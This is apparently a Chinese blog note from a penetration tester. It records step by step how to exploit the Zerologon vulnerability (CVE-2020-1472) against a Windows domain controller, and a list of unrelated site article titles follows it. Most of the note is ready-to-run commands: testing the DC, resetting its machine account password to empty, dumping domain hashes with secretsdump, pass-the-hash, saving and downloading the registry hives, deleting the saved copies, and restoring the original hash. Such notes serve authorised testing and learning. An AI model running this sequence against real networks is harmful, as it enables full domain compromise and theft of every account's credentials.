CVE-2020-1472
2024-10-11 23:38:36
主要记下流程 我擦,这个洞mimikatz也可以搞 但是我就不记录了
检验漏洞是否存在
https://github.com/SecuraBV/CVE-2020-1472
先获取域控信息
然后测试能否攻击
python3 zerologon_tester.py DC_NETBIOS_NAME DC_IP_ADDR
将域控的机器账号被重置为空
https://github.com/risksense/zerologon
使用空密码dump域控上的hash
python3 secretsdump.py muxue.com/DC$@10.10.0.129 -no-pass
pth过去
恢复域控机子hash
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
lget system.save
lget sam.save
lget security.save
del /f system.save
del /f sam.save
del /f security.save
网上很多写的都是get 有可能是因为impacket里的wmiexec更新了 变成了lget
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
然后还原hash
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
查看一下
secretsdump.py domain/administrator:pass@ip -just-dc-user "DC$"
我们可以比对一下上面的图 已经成功修改回来了
记住是双引号 包住机器名 我看别人写的单引号 我这里用单引号不成功
最新文章
- [系统开发] 一个基于Django和PureCSS的内容管理系统
- [小北De编程手记] : Lesson 05 玩转 xUnit.Net 之 从Assert谈UT框架实践
- 【国内独家首发】iPhone4 iOS7不完美越狱教程新鲜出炉
- NoSuchMethodError: antlr.collections.AST.getLine()I
- 如何使用bat命令批量删除指定文件名字的符号
- Codeforces Round #140 (Div. 2)
- 软件工程 --- Pair Project: Elevator Scheduler [电梯调度算法的实现和测试] [附加题]
- Python学习_从文件读取数据和保存数据
- js获取当前url地址及参数
- [Leetcode][048] Rotate Image 略详细 (Java)
- BeeswaxException 以及其他问题
- LeetCode---------Longest Substring Without Repeating Characters解法
- 对 响应数据写在config文件的再次优化
- 初学Git命令
- Android 蓝牙4.0 BLE (onServicesDiscovered 返回 status 是 129,133时)
- CentOS 7 源码编译MariaDB
- 如何利用JMeter模拟超过 5 万的并发用户
- HDU 5745 La Vie en rose 暴力
- pipelinedb 滑动窗口
- C#语法基础
热门文章
- C#调用JAVA(二)调用方法
- 区分DDD中的Domain, Subdomain, Bounded Context, Problem/Solution Space
- 第15章: Prometheus监控Kubernetes资源与应用
- 浅读tomcat架构设计之tomcat生命周期(2)
- JS中的单例模式及单例模式原型类的实现
- Nginx:Nginx配置文件详解
- 【Quartz】Quartz存储与持久化-基于quartz.properties的配置
- CG-CTF 签到
- C# 8.0和.NET Core 3.0高级编程 分享笔记三:控制流程和转换类型
- 深入浅出 Jest 框架的实现原理